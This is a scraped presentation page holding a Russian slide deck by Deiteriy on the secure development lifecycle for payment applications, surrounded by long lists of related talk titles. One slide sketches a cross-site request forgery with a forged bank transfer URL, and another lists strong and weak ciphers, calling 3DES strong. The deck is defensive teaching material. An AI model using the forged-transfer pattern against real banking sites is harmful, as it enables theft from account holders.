Обнаружение необнаруживаемого
 
Кибербезопасность с точки зрения директоров
Кибербезопасность с точки зрения директоровКибербезопасность с точки зрения директоров
Кибербезопасность с точки зрения директоров
 
Информационная безопасность
Информационная безопасностьИнформационная безопасность
Информационная безопасность
 
Аутсорсинг. Управление рисками информационной безопасности
Аутсорсинг. Управление рисками информационной безопасностиАутсорсинг. Управление рисками информационной безопасности
Аутсорсинг. Управление рисками информационной безопасности
 
SearchInform. Сергей Ананич. "Нестандартные методы применения DLP-систем в би...
SearchInform. Сергей Ананич. "Нестандартные методы применения DLP-систем в би...SearchInform. Сергей Ананич. "Нестандартные методы применения DLP-систем в би...
SearchInform. Сергей Ананич. "Нестандартные методы применения DLP-систем в би...
 
Безопаность SAP-систем
Безопаность SAP-системБезопаность SAP-систем
Безопаность SAP-систем
 

En vedette

Коучинговые методики в менеджменте и личной эффективности
Коучинговые методики в менеджменте и личной эффективностиКоучинговые методики в менеджменте и личной эффективности
Коучинговые методики в менеджменте и личной эффективности
RISClubSPb
 
Человек и смартфон. Друзья или враги!?
Человек и смартфон. Друзья или враги!?Человек и смартфон. Друзья или враги!?
Человек и смартфон. Друзья или враги!?
RISClubSPb
 
Практические аспекты разработки безопасного кода с помощью Microsoft SDL
Практические аспекты разработки безопасного кода с помощью Microsoft SDLПрактические аспекты разработки безопасного кода с помощью Microsoft SDL
Практические аспекты разработки безопасного кода с помощью Microsoft SDL
Andrey Beshkov
 
Типовые уязвимости платежных инфраструктур/очный семинар RISC
Типовые уязвимости платежных инфраструктур/очный семинар RISCТиповые уязвимости платежных инфраструктур/очный семинар RISC
Типовые уязвимости платежных инфраструктур/очный семинар RISC
RISClubSPb
 
Программы сертификации ISACA/цикл мастер-классов по программам сертификации I...
Программы сертификации ISACA/цикл мастер-классов по программам сертификации I...Программы сертификации ISACA/цикл мастер-классов по программам сертификации I...
Программы сертификации ISACA/цикл мастер-классов по программам сертификации I...
RISClubSPb
 
Социальные сети: что это такое и стоит ли использовать
Социальные сети: что это такое и стоит ли использоватьСоциальные сети: что это такое и стоит ли использовать
Социальные сети: что это такое и стоит ли использовать
Elena Tikhomirova
 
Стратегия в social media
Стратегия в social mediaСтратегия в social media
Стратегия в social media
Julia Trushina
 
Переосмысляя задачи образовательной системы: новый взгляд на "обучение всю жи...
Переосмысляя задачи образовательной системы: новый взгляд на "обучение всю жи...Переосмысляя задачи образовательной системы: новый взгляд на "обучение всю жи...
Переосмысляя задачи образовательной системы: новый взгляд на "обучение всю жи...
Pavel Luksha
 
От нуля до миллиона пользователей
От нуля до миллиона пользователейОт нуля до миллиона пользователей
От нуля до миллиона пользователей
Слава Баранский
 
Кто такой менеджер интернет-проекта
Кто такой менеджер интернет-проектаКто такой менеджер интернет-проекта
Кто такой менеджер интернет-проекта
Нетология
 

En vedette (20)

Коучинговые методики в менеджменте и личной эффективности
Коучинговые методики в менеджменте и личной эффективностиКоучинговые методики в менеджменте и личной эффективности
Коучинговые методики в менеджменте и личной эффективности
 
Человек и смартфон. Друзья или враги!?
Человек и смартфон. Друзья или враги!?Человек и смартфон. Друзья или враги!?
Человек и смартфон. Друзья или враги!?
 
Практические аспекты разработки безопасного кода с помощью Microsoft SDL
Практические аспекты разработки безопасного кода с помощью Microsoft SDLПрактические аспекты разработки безопасного кода с помощью Microsoft SDL
Практические аспекты разработки безопасного кода с помощью Microsoft SDL
 
Цикл безопасной разработки SDL
Цикл безопасной разработки SDLЦикл безопасной разработки SDL
Цикл безопасной разработки SDL
 
Безопасная разработка для руководителей
Безопасная разработка для руководителейБезопасная разработка для руководителей
Безопасная разработка для руководителей
 
Типовые уязвимости платежных инфраструктур/очный семинар RISC
Типовые уязвимости платежных инфраструктур/очный семинар RISCТиповые уязвимости платежных инфраструктур/очный семинар RISC
Типовые уязвимости платежных инфраструктур/очный семинар RISC
 
Программы сертификации ISACA/цикл мастер-классов по программам сертификации I...
Программы сертификации ISACA/цикл мастер-классов по программам сертификации I...Программы сертификации ISACA/цикл мастер-классов по программам сертификации I...
Программы сертификации ISACA/цикл мастер-классов по программам сертификации I...
 
Защищаем сеть от DDoS-атак
Защищаем сеть от DDoS-атакЗащищаем сеть от DDoS-атак
Защищаем сеть от DDoS-атак
 
DDoS-атаки вчера, сегодня, завтра
DDoS-атаки вчера, сегодня, завтраDDoS-атаки вчера, сегодня, завтра
DDoS-атаки вчера, сегодня, завтра
 
Социальные сети: что это такое и стоит ли использовать
Социальные сети: что это такое и стоит ли использоватьСоциальные сети: что это такое и стоит ли использовать
Социальные сети: что это такое и стоит ли использовать
 
Стратегия в social media
Стратегия в social mediaСтратегия в social media
Стратегия в social media
 
Лучшие книги 2014 по маркетингу
Лучшие книги 2014 по маркетингуЛучшие книги 2014 по маркетингу
Лучшие книги 2014 по маркетингу
 
Content Curation
Content CurationContent Curation
Content Curation
 
Digital-шпаргалка для рекламистов ATLной ориентации. KIAF 2013
Digital-шпаргалка для рекламистов ATLной ориентации. KIAF 2013Digital-шпаргалка для рекламистов ATLной ориентации. KIAF 2013
Digital-шпаргалка для рекламистов ATLной ориентации. KIAF 2013
 
Переосмысляя задачи образовательной системы: новый взгляд на "обучение всю жи...
Переосмысляя задачи образовательной системы: новый взгляд на "обучение всю жи...Переосмысляя задачи образовательной системы: новый взгляд на "обучение всю жи...
Переосмысляя задачи образовательной системы: новый взгляд на "обучение всю жи...
 
От нуля до миллиона пользователей
От нуля до миллиона пользователейОт нуля до миллиона пользователей
От нуля до миллиона пользователей
 
Plenum "Русский хлеб" в рамках проекта "Крутоголики"
Plenum "Русский хлеб" в рамках проекта "Крутоголики"Plenum "Русский хлеб" в рамках проекта "Крутоголики"
Plenum "Русский хлеб" в рамках проекта "Крутоголики"
 
Reaviz лекция 1 Общие понятия
Reaviz лекция 1 Общие понятияReaviz лекция 1 Общие понятия
Reaviz лекция 1 Общие понятия
 
Social psychology in digital
Social psychology in digitalSocial psychology in digital
Social psychology in digital
 
Кто такой менеджер интернет-проекта
Кто такой менеджер интернет-проектаКто такой менеджер интернет-проекта
Кто такой менеджер интернет-проекта
 

Similaire à Жизненный цикл безопасной разработки платежных приложений

PCI DSS как перейти с версии 2.0 на 3.0
PCI DSS как перейти с версии 2.0 на 3.0PCI DSS как перейти с версии 2.0 на 3.0
PCI DSS как перейти с версии 2.0 на 3.0
RISSPA_SPb
 
Cтандарт PCI DSS изменения в новой версии
Cтандарт PCI DSS изменения в новой версииCтандарт PCI DSS изменения в новой версии
Cтандарт PCI DSS изменения в новой версии
RISSPA_SPb
 
Спроси эксперта. 2 сезон 2 серия. Тестирование приложений на уязвимости. Прак...
Спроси эксперта. 2 сезон 2 серия. Тестирование приложений на уязвимости. Прак...Спроси эксперта. 2 сезон 2 серия. Тестирование приложений на уязвимости. Прак...
Спроси эксперта. 2 сезон 2 серия. Тестирование приложений на уязвимости. Прак...
Solar Security
 
Управление соответствием PCI DSS - Секция 5 - Выполнение требований PCI DSS
Управление соответствием PCI DSS - Секция 5 - Выполнение требований PCI DSSУправление соответствием PCI DSS - Секция 5 - Выполнение требований PCI DSS
Управление соответствием PCI DSS - Секция 5 - Выполнение требований PCI DSS
Deiteriy Co. Ltd.
 
Опыт подготовки к CISA/цикл мастер-классов по программам сертификации ISACA
Опыт подготовки к CISA/цикл мастер-классов по программам сертификации ISACAОпыт подготовки к CISA/цикл мастер-классов по программам сертификации ISACA
Опыт подготовки к CISA/цикл мастер-классов по программам сертификации ISACA
RISClubSPb
 
Часто задаваемые вопросы на пути к PCI соответствию
Часто задаваемые вопросы на пути к PCI соответствиюЧасто задаваемые вопросы на пути к PCI соответствию
Часто задаваемые вопросы на пути к PCI соответствию
Digital Security
 
Oracle. Олег Файницкий. "Управление идентификационной информацией в облачных ...
Oracle. Олег Файницкий. "Управление идентификационной информацией в облачных ...Oracle. Олег Файницкий. "Управление идентификационной информацией в облачных ...
Oracle. Олег Файницкий. "Управление идентификационной информацией в облачных ...
Expolink
 
Особенности проведения тестов на проникновение в организациях банковской сферы
Особенности проведения тестов на проникновение в организациях банковской сферыОсобенности проведения тестов на проникновение в организациях банковской сферы
Особенности проведения тестов на проникновение в организациях банковской сферы
Digital Security
 
Сделать безопасно и сертифицировано — ЗАО «ПМ» на DevCon 2015
Сделать безопасно и сертифицировано — ЗАО «ПМ» на DevCon 2015Сделать безопасно и сертифицировано — ЗАО «ПМ» на DevCon 2015
Сделать безопасно и сертифицировано — ЗАО «ПМ» на DevCon 2015
Maxim Avdyunin
 

Similaire à Жизненный цикл безопасной разработки платежных приложений (20)

PCI DSS как перейти с версии 2.0 на 3.0
PCI DSS как перейти с версии 2.0 на 3.0PCI DSS как перейти с версии 2.0 на 3.0
PCI DSS как перейти с версии 2.0 на 3.0
 
Cтандарт PCI DSS изменения в новой версии
Cтандарт PCI DSS изменения в новой версииCтандарт PCI DSS изменения в новой версии
Cтандарт PCI DSS изменения в новой версии
 
Спроси эксперта. 2 сезон 2 серия. Тестирование приложений на уязвимости. Прак...
Спроси эксперта. 2 сезон 2 серия. Тестирование приложений на уязвимости. Прак...Спроси эксперта. 2 сезон 2 серия. Тестирование приложений на уязвимости. Прак...
Спроси эксперта. 2 сезон 2 серия. Тестирование приложений на уязвимости. Прак...
 
Управление соответствием PCI DSS - Секция 5 - Выполнение требований PCI DSS
Управление соответствием PCI DSS - Секция 5 - Выполнение требований PCI DSSУправление соответствием PCI DSS - Секция 5 - Выполнение требований PCI DSS
Управление соответствием PCI DSS - Секция 5 - Выполнение требований PCI DSS
 
Bachelors Diploma Slides Short Version
Bachelors Diploma Slides Short VersionBachelors Diploma Slides Short Version
Bachelors Diploma Slides Short Version
 
Опыт подготовки к CISA/цикл мастер-классов по программам сертификации ISACA
Опыт подготовки к CISA/цикл мастер-классов по программам сертификации ISACAОпыт подготовки к CISA/цикл мастер-классов по программам сертификации ISACA
Опыт подготовки к CISA/цикл мастер-классов по программам сертификации ISACA
 
пр Спроси эксперта. Все, что вы хотели узнать про «дыры» в коде, но не у кого...
пр Спроси эксперта. Все, что вы хотели узнать про «дыры» в коде, но не у кого...пр Спроси эксперта. Все, что вы хотели узнать про «дыры» в коде, но не у кого...
пр Спроси эксперта. Все, что вы хотели узнать про «дыры» в коде, но не у кого...
 
Часто задаваемые вопросы на пути к PCI соответствию
Часто задаваемые вопросы на пути к PCI соответствиюЧасто задаваемые вопросы на пути к PCI соответствию
Часто задаваемые вопросы на пути к PCI соответствию
 
Проблемы безопасной разработки и поддержки импортных средств защиты информации
Проблемы безопасной разработки и поддержки импортных средств защиты информацииПроблемы безопасной разработки и поддержки импортных средств защиты информации
Проблемы безопасной разработки и поддержки импортных средств защиты информации
 
Практика использования Solar inCode
Практика использования Solar inCodeПрактика использования Solar inCode
Практика использования Solar inCode
 
Oracle. Олег Файницкий. "Управление идентификационной информацией в облачных ...
Oracle. Олег Файницкий. "Управление идентификационной информацией в облачных ...Oracle. Олег Файницкий. "Управление идентификационной информацией в облачных ...
Oracle. Олег Файницкий. "Управление идентификационной информацией в облачных ...
 
Особенности проведения тестов на проникновение в организациях банковской сферы
Особенности проведения тестов на проникновение в организациях банковской сферыОсобенности проведения тестов на проникновение в организациях банковской сферы
Особенности проведения тестов на проникновение в организациях банковской сферы
 
пр Лучшие практики SOC
пр Лучшие практики SOCпр Лучшие практики SOC
пр Лучшие практики SOC
 
Спроси эксперта. Solar inСode все, что вы хотели узнать про "дыры" в коде, но...
Спроси эксперта. Solar inСode все, что вы хотели узнать про "дыры" в коде, но...Спроси эксперта. Solar inСode все, что вы хотели узнать про "дыры" в коде, но...
Спроси эксперта. Solar inСode все, что вы хотели узнать про "дыры" в коде, но...
 
Mythbusters - Web Application Security
Mythbusters - Web Application SecurityMythbusters - Web Application Security
Mythbusters - Web Application Security
 
петров антон Short cv2
петров антон Short cv2петров антон Short cv2
петров антон Short cv2
 
Лекция 2 тестирование и жизненный цикл ПО
Лекция 2 тестирование и жизненный цикл ПОЛекция 2 тестирование и жизненный цикл ПО
Лекция 2 тестирование и жизненный цикл ПО
 
Сделать безопасно и сертифицировано — ЗАО «ПМ» на DevCon 2015
Сделать безопасно и сертифицировано — ЗАО «ПМ» на DevCon 2015Сделать безопасно и сертифицировано — ЗАО «ПМ» на DevCon 2015
Сделать безопасно и сертифицировано — ЗАО «ПМ» на DevCon 2015
 
пр 02.Устройство и Сервисы JSOC
пр 02.Устройство и Сервисы JSOCпр 02.Устройство и Сервисы JSOC
пр 02.Устройство и Сервисы JSOC
 
Устройство и Сервисы JSOC
Устройство и Сервисы JSOCУстройство и Сервисы JSOC
Устройство и Сервисы JSOC
 

Plus de RISClubSPb

Опыт подготовки к CISM/цикл мастер-классов по программам сертификации ISACA
Опыт подготовки к CISM/цикл мастер-классов по программам сертификации ISACAОпыт подготовки к CISM/цикл мастер-классов по программам сертификации ISACA
Опыт подготовки к CISM/цикл мастер-классов по программам сертификации ISACA
RISClubSPb
 
Опыт подготовки к CRISC/цикл мастер-классов по программам сертификации ISACA
Опыт подготовки к CRISC/цикл мастер-классов по программам сертификации ISACAОпыт подготовки к CRISC/цикл мастер-классов по программам сертификации ISACA
Опыт подготовки к CRISC/цикл мастер-классов по программам сертификации ISACA
RISClubSPb
 
Эксперт, Блогер, Евангелист #поИБэ. Как я докатился до такой жизни/кейс-чемпи...
Эксперт, Блогер, Евангелист #поИБэ. Как я докатился до такой жизни/кейс-чемпи...Эксперт, Блогер, Евангелист #поИБэ. Как я докатился до такой жизни/кейс-чемпи...
Эксперт, Блогер, Евангелист #поИБэ. Как я докатился до такой жизни/кейс-чемпи...
RISClubSPb
 
Майндкарты в жизни специалиста по информационной безопасности
Майндкарты в жизни специалиста по информационной безопасностиМайндкарты в жизни специалиста по информационной безопасности
Майндкарты в жизни специалиста по информационной безопасности
RISClubSPb
 
Страхование рисков ИБ: настоящее и будущее/очный семинар RISC
Страхование рисков ИБ: настоящее и будущее/очный семинар RISCСтрахование рисков ИБ: настоящее и будущее/очный семинар RISC
Страхование рисков ИБ: настоящее и будущее/очный семинар RISC
RISClubSPb
 
Анализ российского рынка ИБ в контексте стратегии импортозамещения/очный семи...
Анализ российского рынка ИБ в контексте стратегии импортозамещения/очный семи...Анализ российского рынка ИБ в контексте стратегии импортозамещения/очный семи...
Анализ российского рынка ИБ в контексте стратегии импортозамещения/очный семи...
RISClubSPb
 
Управление ИБ в условиях текущей неопределенности/очный семинар RISC
Управление ИБ в условиях текущей неопределенности/очный семинар RISCУправление ИБ в условиях текущей неопределенности/очный семинар RISC
Управление ИБ в условиях текущей неопределенности/очный семинар RISC
RISClubSPb
 
Деятельность подразделений ИБ в условиях сокращения бюджетов/очный семинар RISC
Деятельность подразделений ИБ в условиях сокращения бюджетов/очный семинар RISCДеятельность подразделений ИБ в условиях сокращения бюджетов/очный семинар RISC
Деятельность подразделений ИБ в условиях сокращения бюджетов/очный семинар RISC
RISClubSPb
 
Корпоративные неструктурированные данные: мониторинг, аудит, управление и защ...
Корпоративные неструктурированные данные: мониторинг, аудит, управление и защ...Корпоративные неструктурированные данные: мониторинг, аудит, управление и защ...
Корпоративные неструктурированные данные: мониторинг, аудит, управление и защ...
RISClubSPb
 
Криминалистика в современном мире. Дело о фантомном проникновении
Криминалистика в современном мире. Дело о фантомном проникновенииКриминалистика в современном мире. Дело о фантомном проникновении
Криминалистика в современном мире. Дело о фантомном проникновении
RISClubSPb
 
Проблемы взаимодействия ИБ и ИТ департаментов: взгляд со стороны ИБ/очный сем...
Проблемы взаимодействия ИБ и ИТ департаментов: взгляд со стороны ИБ/очный сем...Проблемы взаимодействия ИБ и ИТ департаментов: взгляд со стороны ИБ/очный сем...
Проблемы взаимодействия ИБ и ИТ департаментов: взгляд со стороны ИБ/очный сем...
RISClubSPb
 
Проблематика подбора специалистов по ИБ на российском рынке труда/очный семин...
Проблематика подбора специалистов по ИБ на российском рынке труда/очный семин...Проблематика подбора специалистов по ИБ на российском рынке труда/очный семин...
Проблематика подбора специалистов по ИБ на российском рынке труда/очный семин...
RISClubSPb
 
Повышение осведомленности пользователей по вопросам ИБ/очный семинар RISC
Повышение осведомленности пользователей по вопросам ИБ/очный семинар RISCПовышение осведомленности пользователей по вопросам ИБ/очный семинар RISC
Повышение осведомленности пользователей по вопросам ИБ/очный семинар RISC
RISClubSPb
 
Темные пятна в ИБ, где ваше слабое звено/очный семинар RISC
Темные пятна в ИБ, где ваше слабое звено/очный семинар RISCТемные пятна в ИБ, где ваше слабое звено/очный семинар RISC
Темные пятна в ИБ, где ваше слабое звено/очный семинар RISC
RISClubSPb
 
Человек смотрящий/очный семинар RISC
Человек смотрящий/очный семинар RISCЧеловек смотрящий/очный семинар RISC
Человек смотрящий/очный семинар RISC
RISClubSPb
 
Как эффективно работать с информацией
Как эффективно работать с информациейКак эффективно работать с информацией
Как эффективно работать с информацией
RISClubSPb
 
Тестирование на проникновение: задача, решение и ограничения
Тестирование на проникновение: задача, решение и ограниченияТестирование на проникновение: задача, решение и ограничения
Тестирование на проникновение: задача, решение и ограничения
RISClubSPb
 

Plus de RISClubSPb (20)

Опыт подготовки к CISM/цикл мастер-классов по программам сертификации ISACA
Опыт подготовки к CISM/цикл мастер-классов по программам сертификации ISACAОпыт подготовки к CISM/цикл мастер-классов по программам сертификации ISACA
Опыт подготовки к CISM/цикл мастер-классов по программам сертификации ISACA
 
Опыт подготовки к CRISC/цикл мастер-классов по программам сертификации ISACA
Опыт подготовки к CRISC/цикл мастер-классов по программам сертификации ISACAОпыт подготовки к CRISC/цикл мастер-классов по программам сертификации ISACA
Опыт подготовки к CRISC/цикл мастер-классов по программам сертификации ISACA
 
Эксперт, Блогер, Евангелист #поИБэ. Как я докатился до такой жизни/кейс-чемпи...
Эксперт, Блогер, Евангелист #поИБэ. Как я докатился до такой жизни/кейс-чемпи...Эксперт, Блогер, Евангелист #поИБэ. Как я докатился до такой жизни/кейс-чемпи...
Эксперт, Блогер, Евангелист #поИБэ. Как я докатился до такой жизни/кейс-чемпи...
 
Майндкарты в жизни специалиста по информационной безопасности
Майндкарты в жизни специалиста по информационной безопасностиМайндкарты в жизни специалиста по информационной безопасности
Майндкарты в жизни специалиста по информационной безопасности
 
Страхование рисков ИБ: настоящее и будущее/очный семинар RISC
Страхование рисков ИБ: настоящее и будущее/очный семинар RISCСтрахование рисков ИБ: настоящее и будущее/очный семинар RISC
Страхование рисков ИБ: настоящее и будущее/очный семинар RISC
 
Бизнес-игра «А что, если?»
Бизнес-игра «А что, если?»Бизнес-игра «А что, если?»
Бизнес-игра «А что, если?»
 
Анализ российского рынка ИБ в контексте стратегии импортозамещения/очный семи...
Анализ российского рынка ИБ в контексте стратегии импортозамещения/очный семи...Анализ российского рынка ИБ в контексте стратегии импортозамещения/очный семи...
Анализ российского рынка ИБ в контексте стратегии импортозамещения/очный семи...
 
Управление ИБ в условиях текущей неопределенности/очный семинар RISC
Управление ИБ в условиях текущей неопределенности/очный семинар RISCУправление ИБ в условиях текущей неопределенности/очный семинар RISC
Управление ИБ в условиях текущей неопределенности/очный семинар RISC
 
Деятельность подразделений ИБ в условиях сокращения бюджетов/очный семинар RISC
Деятельность подразделений ИБ в условиях сокращения бюджетов/очный семинар RISCДеятельность подразделений ИБ в условиях сокращения бюджетов/очный семинар RISC
Деятельность подразделений ИБ в условиях сокращения бюджетов/очный семинар RISC
 
Корпоративные неструктурированные данные: мониторинг, аудит, управление и защ...
Корпоративные неструктурированные данные: мониторинг, аудит, управление и защ...Корпоративные неструктурированные данные: мониторинг, аудит, управление и защ...
Корпоративные неструктурированные данные: мониторинг, аудит, управление и защ...
 
Психология на службе ИБ
Психология на службе ИБПсихология на службе ИБ
Психология на службе ИБ
 
Криминалистика в современном мире. Дело о фантомном проникновении
Криминалистика в современном мире. Дело о фантомном проникновенииКриминалистика в современном мире. Дело о фантомном проникновении
Криминалистика в современном мире. Дело о фантомном проникновении
 
Внутренний маркетинг службы ИБ
Внутренний маркетинг службы ИБВнутренний маркетинг службы ИБ
Внутренний маркетинг службы ИБ
 
Проблемы взаимодействия ИБ и ИТ департаментов: взгляд со стороны ИБ/очный сем...
Проблемы взаимодействия ИБ и ИТ департаментов: взгляд со стороны ИБ/очный сем...Проблемы взаимодействия ИБ и ИТ департаментов: взгляд со стороны ИБ/очный сем...
Проблемы взаимодействия ИБ и ИТ департаментов: взгляд со стороны ИБ/очный сем...
 
Проблематика подбора специалистов по ИБ на российском рынке труда/очный семин...
Проблематика подбора специалистов по ИБ на российском рынке труда/очный семин...Проблематика подбора специалистов по ИБ на российском рынке труда/очный семин...
Проблематика подбора специалистов по ИБ на российском рынке труда/очный семин...
 
Повышение осведомленности пользователей по вопросам ИБ/очный семинар RISC
Повышение осведомленности пользователей по вопросам ИБ/очный семинар RISCПовышение осведомленности пользователей по вопросам ИБ/очный семинар RISC
Повышение осведомленности пользователей по вопросам ИБ/очный семинар RISC
 
Темные пятна в ИБ, где ваше слабое звено/очный семинар RISC
Темные пятна в ИБ, где ваше слабое звено/очный семинар RISCТемные пятна в ИБ, где ваше слабое звено/очный семинар RISC
Темные пятна в ИБ, где ваше слабое звено/очный семинар RISC
 
Человек смотрящий/очный семинар RISC
Человек смотрящий/очный семинар RISCЧеловек смотрящий/очный семинар RISC
Человек смотрящий/очный семинар RISC
 
Как эффективно работать с информацией
Как эффективно работать с информациейКак эффективно работать с информацией
Как эффективно работать с информацией
 
Тестирование на проникновение: задача, решение и ограничения
Тестирование на проникновение: задача, решение и ограниченияТестирование на проникновение: задача, решение и ограничения
Тестирование на проникновение: задача, решение и ограничения
 

Жизненный цикл безопасной разработки платежных приложений

  • 1. © ООО «Дейтерий», 2010 – 2016 | 192012, Россия, Санкт-Петербург, пр. Обуховской Обороны д. 271, лит. А | +7 (812) 361-61-55 | www.deiteriy.com | info@deiteriy.com Жизненный цикл безопасной разработки программного обеспечения
  • 2. 1-2 Жизненный цикл безопасной разработки программного обеспечения © ООО «Дейтерий», 2010 – 2016 | 192012, Россия, Санкт-Петербург, пр. Обуховской Обороны д. 271, лит. А | +7 (812) 361-61-55 | www.deiteriy.com | info@deiteriy.com Кристина Андреева Специалист по защите информации компании Deiteriy, CISA, PCI QSA. Семен Уваров Специалист по тестированию на проникновение компании Deiteriy. Спикеры
  • 3. 1-3 Жизненный цикл безопасной разработки программного обеспечения © ООО «Дейтерий», 2010 – 2016 | 192012, Россия, Санкт-Петербург, пр. Обуховской Обороны д. 271, лит. А | +7 (812) 361-61-55 | www.deiteriy.com | info@deiteriy.com Стадии жизненного цикла Стадия 1: разработка требований Стадия 2: проектирование Стадия 3: разработка кода Стадия 4: тестирование приложения Стадия 5: перевод в боевую среду Стадия 6: поддержка
  • 4. 1-4 Жизненный цикл безопасной разработки программного обеспечения © ООО «Дейтерий», 2010 – 2016 | 192012, Россия, Санкт-Петербург, пр. Обуховской Обороны д. 271, лит. А | +7 (812) 361-61-55 | www.deiteriy.com | info@deiteriy.com Стадия 1: разработка требований Функциональность должно делать Безопасность не должно делать Аутентификация Перебор пароля Авторизация Лишние права доступа Восстановление пароля Повторное использование ссылки для восстановления пароля Управление сессиями Перехват сессии Передача данных Перехват данных Оплата по банковской карте Использование недействительных данных банковской карты Обработка исключений Вывод полного содержимого ошибки на экран пользователю Протоколирование событий Сохранение в журналах критичных данных Стадия 1: Разработка требований Стадия 2: Проектирование Стадия 3: Разработка кода Стадия 4: Тестирование приложения Стадия 5: Перевод в боевую среду Стадия 6: Поддержка
  • 5. 1-5 Жизненный цикл безопасной разработки программного обеспечения © ООО «Дейтерий», 2010 – 2016 | 192012, Россия, Санкт-Петербург, пр. Обуховской Обороны д. 271, лит. А | +7 (812) 361-61-55 | www.deiteriy.com | info@deiteriy.com Восстановление пароля • одноразовые ссылки; • ограничение на количество запросов восстановления. https://example.ru/user/password/restore?user Id=vasya@gmail.com&code=1625382736 &confirm=768GhtyI787Ght https://example.ru/user/password/restore?user Id=vasya@gmail.com&code=1625382736 &confirm=768GhtyI787Ght https://example.ru/user/password/restore?user Id=vasya@gmail.com&code=1625382736 &confirm=768GhtyI787Ght https://example.ru/user/password/restore?user Id=vasya@gmail.com&code=1625382736 &confirm=768GhtyI787Ght Стадия 1: Разработка требований Стадия 2: Проектирование Стадия 3: Разработка кода Стадия 4: Тестирование приложения Стадия 5: Перевод в боевую среду Стадия 6: Поддержка
  • 6. 1-6 Жизненный цикл безопасной разработки программного обеспечения © ООО «Дейтерий», 2010 – 2016 | 192012, Россия, Санкт-Петербург, пр. Обуховской Обороны д. 271, лит. А | +7 (812) 361-61-55 | www.deiteriy.com | info@deiteriy.com Корректное управление сессиями Bank.ruBank.ru Transfer 10 000 http://bank.ru/ transfermoney?to=….&amount=10000"> Стадия 1: Разработка требований Стадия 2: Проектирование Стадия 3: Разработка кода Стадия 4: Тестирование приложения Стадия 5: Перевод в боевую среду Стадия 6: Поддержка
  • 7. 1-7 Жизненный цикл безопасной разработки программного обеспечения © ООО «Дейтерий», 2010 – 2016 | 192012, Россия, Санкт-Петербург, пр. Обуховской Обороны д. 271, лит. А | +7 (812) 361-61-55 | www.deiteriy.com | info@deiteriy.com Корректное управление сессиями Bank.ruBank.ru • Использование токенов: – уникальные; – непредсказуемые. TOKEN=26022016112045 TOKEN=90c09cad2bb1f7ef863deaf731ee1f21 HTTP request TOKEN=1ghY872…... HTTP respond TOKEN=1ghY872…... Стадия 1: Разработка требований Стадия 2: Проектирование Стадия 3: Разработка кода Стадия 4: Тестирование приложения Стадия 5: Перевод в боевую среду Стадия 6: Поддержка
  • 8. 1-8 Жизненный цикл безопасной разработки программного обеспечения © ООО «Дейтерий», 2010 – 2016 | 192012, Россия, Санкт-Петербург, пр. Обуховской Обороны д. 271, лит. А | +7 (812) 361-61-55 | www.deiteriy.com | info@deiteriy.com - все данные введены верно. Верификация платежных данных - не позднее текущей даты; - не больше пяти лет. - только цифры; - начинается на 4 и 5; - BIN номера; - алгоритм Луна. - ограничение на количество символов; - три цифры. - все данные введены верно. Стадия 1: Разработка требований Стадия 2: Проектирование Стадия 3: Разработка кода Стадия 4: Тестирование приложения Стадия 5: Перевод в боевую среду Стадия 6: Поддержка
  • 9. 1-9 Жизненный цикл безопасной разработки программного обеспечения © ООО «Дейтерий», 2010 – 2016 | 192012, Россия, Санкт-Петербург, пр. Обуховской Обороны д. 271, лит. А | +7 (812) 361-61-55 | www.deiteriy.com | info@deiteriy.com Хранение критичных данных • Маскирование: 1234 56** **** 7890 • Хеширование: – нестойкие: MD5, SHA1 – стойкие: SHA512, Salt • Шифрование: – нестойкие: DES, RC4, XOR – стойкие: AES, 3DES • Токенизация: 81F9D5C87DE03C ! Маскирование + хеширование PAN Стадия 1: Разработка требований Стадия 2: Проектирование Стадия 3: Разработка кода Стадия 4: Тестирование приложения Стадия 5: Перевод в боевую среду Стадия 6: Поддержка
  • 10. 1-10 Жизненный цикл безопасной разработки программного обеспечения © ООО «Дейтерий», 2010 – 2016 | 192012, Россия, Санкт-Петербург, пр. Обуховской Обороны д. 271, лит. А | +7 (812) 361-61-55 | www.deiteriy.com | info@deiteriy.com Стадия 2: проектирование Функциональность Безопасность Проектирование архитектуры приложения Проектирование системы защиты приложения Детальное проектирование функций Детальное проектирование функций безопасности Алгоритмы работы Изучение алгоритмов работы и поиск слабых мест Диаграммы: UML, блок-схемы, потоки данных Изучение схемы потоков данных и поиск слабых мест, моделирование угроз безопасности Стадия 1: Разработка требований Стадия 2: Проектирование Стадия 3: Разработка кода Стадия 4: Тестирование приложения Стадия 5: Перевод в боевую среду Стадия 6: Поддержка
  • 11. 1-11 Жизненный цикл безопасной разработки программного обеспечения © ООО «Дейтерий», 2010 – 2016 | 192012, Россия, Санкт-Петербург, пр. Обуховской Обороны д. 271, лит. А | +7 (812) 361-61-55 | www.deiteriy.com | info@deiteriy.com Анализ потоков данных Приложение (2) Вход в систему (1) Регистрация (3) Заказ товара Персональные данные Логин, пароль Пароль для входа Успешно/ошибка Данные заказа Данные карты Успешно/ошибка (5) Третья сторона(5) Третья сторона Данные карты (4) База данных Данные Данные Данные Стадия 1: Разработка требований Стадия 2: Проектирование Стадия 3: Разработка кода Стадия 4: Тестирование приложения Стадия 5: Перевод в боевую среду Стадия 6: Поддержка
  • 12. 1-12 Жизненный цикл безопасной разработки программного обеспечения © ООО «Дейтерий», 2010 – 2016 | 192012, Россия, Санкт-Петербург, пр. Обуховской Обороны д. 271, лит. А | +7 (812) 361-61-55 | www.deiteriy.com | info@deiteriy.com Корректная обработка ошибок • Try … catch Стадия 1: Разработка требований Стадия 2: Проектирование Стадия 3: Разработка кода Стадия 4: Тестирование приложения Стадия 5: Перевод в боевую среду Стадия 6: Поддержка
  • 13. 1-13 Жизненный цикл безопасной разработки программного обеспечения © ООО «Дейтерий», 2010 – 2016 | 192012, Россия, Санкт-Петербург, пр. Обуховской Обороны д. 271, лит. А | +7 (812) 361-61-55 | www.deiteriy.com | info@deiteriy.com Безопасная работа с HTTP-запросами • Использование GET при передаче: – сохраняется в истории браузера. • Заголовки безопасности: – Cache-Control: no-store – Pragma: no-cache – X-Frame-Options: DENY – Strict-Transport-Security: max-age=16070400; includeSubDomains – Content-Security-Policy: default-src ‘self’ Стадия 1: Разработка требований Стадия 2: Проектирование Стадия 3: Разработка кода Стадия 4: Тестирование приложения Стадия 5: Перевод в боевую среду Стадия 6: Поддержка
